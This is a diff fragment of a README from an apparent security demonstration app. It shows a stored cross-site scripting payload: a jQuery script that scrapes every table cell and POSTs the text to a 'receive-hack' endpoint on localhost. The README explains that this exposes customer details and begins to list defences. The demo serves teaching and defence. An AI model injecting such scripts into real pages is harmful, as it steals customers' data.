grantharper/security-demo/README.md

 `<script type="text/javascript">$(document).ready(function(){var accountInfo="";$("table").children("tbody").children("tr").each(function(){$(this).children("td").each(function(){accountInfo=accountInfo+";"+$(this).text();});});$.post("http://localhost:8080/receive-hack", {accountInfo:accountInfo});});alert("hacked");</script>`

-This attack will allow a malicious user to inject a script into the database that then will run on the employee level and expose customer details to an external web server controlled by the malicious user.
-In this case, it is simply the same app server as is running, but this would be different in a real attack.
+This attack will allow a malicious user to inject a script into the database that then will run on the employee level and expose customer details to another endpoint controlled by the malicious user.
+In this case, it is simply the same app server, but this would be different in a real attack.

 Defending against this vulnerability can be done at multiple levels
 * Validating user input